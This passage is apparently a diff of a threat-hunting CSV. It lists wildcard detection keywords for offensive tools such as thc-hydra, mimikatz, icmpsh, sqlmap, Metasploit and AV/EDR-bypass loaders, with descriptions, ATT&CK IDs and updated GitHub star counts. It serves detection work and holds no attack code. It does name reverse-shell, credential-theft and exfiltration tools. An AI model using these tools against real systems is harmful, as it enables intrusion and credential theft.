+"*HYDRA_PROXY_HTTP*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
+"*hydra-cobaltstrike*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
 "*Hyperion PE-Crypter*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
 "*hyperion.exe *","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
 "*hyperion_2.0.orig.tar.gz*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
@@ -11448,10 +11601,10 @@
 "*hypobrychium.exe*","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z"
 "*hypobrychium-main*","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z"
 "*i2pinstall*","offensive_tool_keyword","I2P","I2P - The Invisible Internet Project.","T1048.001 - T1568.003","TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://geti2p.net/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*iam__enum_assume_role/default-word-list.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
-"*iAmAnIndependentStrongPassswordThatNeedsToBeSecure*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z"
+"*iam__enum_assume_role/default-word-list.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*iAmAnIndependentStrongPassswordThatNeedsToBeSecure*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z"
 "*iammaguire/Gotato*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z"
-"*ibmiscanner2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*ibmiscanner2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
 "*IBurpExtender.java*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z"
 "*IBurpExtenderCallbacks.java*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0010 - TA0007 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z"
 "*icebreaker:P@ssword123456*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
@@ -11459,104 +11612,104 @@ "*icebreaker-scan.xml*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*IcebreakerSecurity/DelegationBOF*","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*IcebreakerSecurity/DelegationBOF*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. 
and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" -"*IcebreakerSecurity/PersistBOF*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*IcebreakerSecurity/PersistBOF*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*ice-wzl/wmiexec2*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" "*ICMP-ReceiveFile.py*","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","285","57","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" -"*Icmp-Redirect.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*Icmp-Redirect.py*","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*ICMP-SendFile.py*","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","285","57","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" "*icmpsh.exe*","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*icmpsh.exe*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*icmpsh.exe*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "*icmpsh.git*","offensive_tool_keyword","icmpsh","Simple reverse ICMP shell","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/bdamele/icmpsh","1","1","N/A","10","10","1475","424","2018-04-06T17:15:44Z","2011-04-15T10:04:12Z" "*icmpsh_m.py*","offensive_tool_keyword","icmpsh","venom - C2 shellcode 
generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*icmpsh_m.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*icmpsh_m.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "*icmpsh-m.*","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*icmpsh-m.c*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"*icmpsh-m.pl*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*icmpsh-m.c*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - 
TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*icmpsh-m.pl*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "*icmpsh-master*","offensive_tool_keyword","icmpsh","Simple reverse ICMP shell","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/bdamele/icmpsh","1","1","N/A","10","10","1475","424","2018-04-06T17:15:44Z","2011-04-15T10:04:12Z" "*icmpsh-s.*","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*icmptunnel*","offensive_tool_keyword","icmptunnel","icmptunnel works by encapsulating your IP traffic in ICMP echo packets and sending them to your own proxy server. The proxy server decapsulates the packet and forwards the IP traffic. The incoming IP packets which are destined for the client are again encapsulated in ICMP reply packets and sent back to the client. 
The IP traffic is sent in the 'data' field of ICMP packets.","T1041 - T1001 - T1570","TA0011","N/A","N/A","Defense Evasion","https://github.com/s-h-3-l-l/katoolin3","1","0","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*icyguider/LightsOut*","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/icyguider/LightsOut","1","1","N/A","N/A","3","243","29","2023-06-09T10:39:36Z","2023-06-01T14:57:44Z" -"*id::modify*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*id::modify*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*IDiagnosticProfileUAC.git*","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","10","2","173","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" "*IDiagnosticProfileUAC-main*","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","10","2","173","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" "*Idov31/Jormungandr*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" -"*idrac_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*idrac_default_user.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*idrac_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*idrac_default_user.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*IDSyscall.exe*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*IDSyscall.sln*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*IDSyscall.vcxproj*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*IDSyscall/IDSyscall*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*IDSyscall\IDSyscall*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" -"*ie_execcommand_uaf.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ie_win_fakenotification-clippy*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*ie_win_htapowershell.*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*ie_win_missingflash-prettytheft*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ie_execcommand_uaf.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
